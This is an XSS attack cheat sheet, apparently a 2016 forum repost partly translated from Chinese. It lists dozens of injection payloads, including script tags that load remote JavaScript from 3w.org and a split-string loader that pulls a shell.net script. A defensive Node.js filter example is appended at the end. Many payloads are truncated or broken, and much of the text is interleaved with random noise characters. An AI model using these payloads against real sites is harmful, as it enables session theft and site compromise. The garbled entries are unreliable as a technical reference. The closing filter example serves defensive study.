
XSS Attack Roundup

Posted 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab to split up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line injected JavaScript; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (all scripts must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically useless in China, since there is nowhere they can be exploited)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>
8 ~0 j9 J# V2 W(34)IMG Dynsrc+ y& U$ @, Y: h. C) e
<IMG DYNSRC=\'#\'" /span>
0 u' [5 {, S9 h$ ]% f7 W. K( S$ E2 k( z- N6 c6 G6 o
(35)IMG Lowsrc; x. Z7 r) f' [4 a% m2 O1 ]" r6 G" w
<IMG LOWSRC=\'#\'" /span>
4 Q5 |: }5 y4 i" F8 v
/ L5 |$ K  q" ^1 ^  l(36)BGSOUND, Q) m! h; @- U
<BGSOUND SRC=\'#\'" /span>  \6 G) \( O% ?. J: B; {# E( K. S3 C
* |0 n. b$ y9 }, I
(37)STYLE sheet/ n; R/ E0 \% R  ]
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) _: c$ t6 m1 a; R& {! Q7 r5 V5 E; s3 s* P, i6 N
(38)远程样式表
8 E* t( L& k9 X5 D% Z<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ y6 i# W1 {; O/ l% \$ u% g5 Q3 A. F- c  L5 F: H; R! ]9 N
(39)List-style-image(列表式)4 a. [7 r* o/ j1 x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 g2 U5 X) d" Z# H5 a0 {/ I, W& g1 p
(40)IMG VBscript
# h$ L5 M6 S) z9 _* K% o& L3 @4 ?<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! U* Y( I1 K/ g' A6 U0 J
& |+ j/ X9 j# f( |5 V: I(41)META链接url
$ M" @: R1 P2 |<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
% B, p! {0 {" e+ a  C. J: ?- O; Z# s$ n0 u; t+ K. f- B- t
(42)Iframe
# ]5 m- ~# d6 Y1 d- \% R<IFRAME SRC=\'#\'" /IFRAME>
* `. E& I9 ?5 p2 |
0 E. R& R# @, m) K1 f) H0 l& Z(43)Frame
1 M2 m: {$ o" C' z1 `<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>8 G2 R& R$ A1 R) s; v

; X  s: V) f8 P0 M(44)Table+ H5 y+ X# M' [& P/ v" y1 P: b
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! }* D, y. q! L/ g: q
  |$ P2 ]" a4 W/ Z4 Y5 R& f% C$ S
(45)TD0 s, n1 p8 W$ H+ j8 R
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 ^' _: C$ \2 x$ G! |1 h+ k
( Y; B- Z& b2 M8 D5 C$ Z(46)DIV background-image0 ]9 }8 ?. s/ s/ e- I8 L& h
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 l0 j8 i9 a$ t7 u
1 T' D. P! _& P# E) `' z) X
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ D5 E. K6 a. T( Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 V0 R# m& h) ?7 I% U
+ u  \4 h! r) D$ V$ b" P(48)DIV expression- e7 }& j# [* I( _  S6 V/ f
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# |6 r* Q2 u0 n- M2 R) B, G$ E- L8 `* s, b
(49)STYLE属性分拆表达
7 n  o' O0 L# c: ^, O0 T$ Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
0 n1 I+ a- ?3 F' I% x
# K" v, t& ^+ j1 T(50)匿名STYLE(组成:开角号和一个字母开头)% ]; d4 [+ o4 s  E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>1 l  p9 z4 R! ^/ u* u" y
0 }0 V$ T& A2 Y. J- N4 h
(51)STYLE background-image
& ?5 Z) D' w8 Z# X, ]- h4 K% o<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>8 u' e% B7 O& ]) i. p

$ Q: G/ h! W' n: F5 H(52)IMG STYLE方式
+ g& v, ]3 n: m( ~2 s' }2 Pexppression(alert(“XSS”))’>7 ?+ v) K3 }! o- }" D
* n- q+ `% }) M% q- M! _& Y
(53)STYLE background
. l; b. \# Y+ L/ x" f( ^. v/ d<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 D- k5 y4 H5 e9 Y5 T9 N( W2 B' Z& B
5 n/ c4 q0 @. G3 B, x' I
(54)BASE
% m: x  d' @3 X4 y! A& y<BASE HREF=”javascript:alert(‘XSS’);//”>: U" ?' y; i- d3 I; }( B- U

, {% i( Y1 f0 V7 I/ b! M* z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 e# |7 J; K. n, t1 N% X<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
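The encoded and split-up javascript: payloads in entries 3-19 and 47 all rely on the browser decoding and discarding characters that a naive filter never sees. As an added example that is not part of the original post, the Node.js script below normalises a URL-bearing attribute value the way a browser does (decode character references with or without semicolons, drop tab, newline, carriage return and NUL, strip leading control characters, lowercase) and then allowlists the scheme, next to the case-sensitive substring filter these payloads slip past. Function names, the constructed sample values and the exact set of leading code points stripped are this example's own assumptions.

```javascript
// Added example, not from the original post: normalise a URL-bearing attribute
// value the way a browser does, then allowlist its scheme. Function names,
// sample values and the exact set of stripped leading code points are this
// example's own assumptions.

// Decode HTML character references. Browsers also accept numeric references
// whose trailing ';' is missing (entries 9 and 10 above rely on that), so the
// ';' is optional for numeric references here.
function decodeCharRefs(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s.replace(/&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&([a-zA-Z]+);/g,
    (match, hex, dec, name) => {
      if (name !== undefined) {
        return Object.prototype.hasOwnProperty.call(named, name) ? named[name] : match;
      }
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    });
}

// Leading code points a browser discards before reading the scheme: 0x00-0x20
// (entry 47's "1-32"), U+00A0, U+3000 and U+FEFF from the same entry, and
// U+2000-U+200B as an assumption for its garbled "8192-8" range.
const LEADING_JUNK = /^[\u0000-\u0020\u00A0\u2000-\u200B\u3000\uFEFF]+/;

// Mirror what the HTML and URL parsers do to an attribute value before the
// scheme is compared: decode references (entries 5, 9, 10), drop tab, newline
// and carriage return anywhere (entries 11-14), drop NUL, which old IE ignored
// (entry 17), strip leading junk (entries 19, 47) and lowercase (entry 4).
function normaliseUrl(value) {
  return decodeCharRefs(value)
    .replace(/[\t\n\r\0]/g, '')
    .replace(LEADING_JUNK, '')
    .toLowerCase();
}

// Scheme of a normalised URL, or null when the URL is relative.
function schemeOf(normalised) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normalised);
  return m ? m[1] : null;
}

// The weak check: a case-sensitive substring test on the raw attribute value.
function naiveFilterBlocks(value) {
  return value.includes('javascript:');
}

// The hardened check: allowlist the schemes the site actually serves instead
// of blocklisting the ones it fears. Relative URLs (no scheme) pass.
const ALLOWED_SCHEMES = new Set(['http', 'https']);
function urlIsSafe(value) {
  const scheme = schemeOf(normaliseUrl(value));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed attribute values modelled on the entries named in the comments.
const SAMPLES = [
  ['relative', '/images/logo.png'],
  ['absolute https', 'https://example.com/logo.png'],
  ['plain', "javascript:alert('XSS')"],                                                       // entry 3
  ['mixed case', "JaVaScRiPt:alert('XSS')"],                                                  // entry 4
  ['decimal refs', '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)'], // entry 5
  ['hex refs, no ;', '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61lert(1)'],  // entry 10
  ['embedded tab', "jav&#x09;ascript:alert('XSS');"],                                        // entry 12
  ['embedded newline', "jav\nascript:alert('XSS');"],                                         // entry 13
  ['embedded CR', "jav&#x0D;ascript:alert('XSS');"],                                          // entry 14
  ['NUL byte', "java\0script:alert('XSS')"],                                                  // entry 17
  ['leading junk', " &#14;  javascript:alert('XSS');"],                                        // entry 19
  ['vbscript', "vbscript:msgbox('XSS')"],                                                     // entry 40
];

// Run every sample through both checks.
function evaluateSamples(samples = SAMPLES) {
  return samples.map(([label, value]) => ({
    label,
    naiveBlocks: naiveFilterBlocks(value),
    hardenedRejects: !urlIsSafe(value),
  }));
}

// Labels of the samples the naive filter lets through but the hardened check
// rejects: the gap the cheat sheet above exploits.
function naiveMisses() {
  return evaluateSamples()
    .filter((r) => !r.naiveBlocks && r.hardenedRejects)
    .map((r) => r.label);
}

for (const r of evaluateSamples()) {
  console.log(`${r.label.padEnd(18)} naive blocks: ${String(r.naiveBlocks).padEnd(5)} hardened rejects: ${r.hardenedRejects}`);
}
```

Run it with node and the table shows the naive filter stopping only the two samples that contain the literal lowercase string javascript:, while every encoded, split or mixed-case variant, and the vbscript: scheme, gets through; the allowlist rejects all of them and still passes relative and https URLs. The point is that a filter has to do the same decoding and stripping as the browser before it compares anything, and even then a scheme allowlist is the safer shape than a blocklist.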
+ V* a: ?' P0 H6 k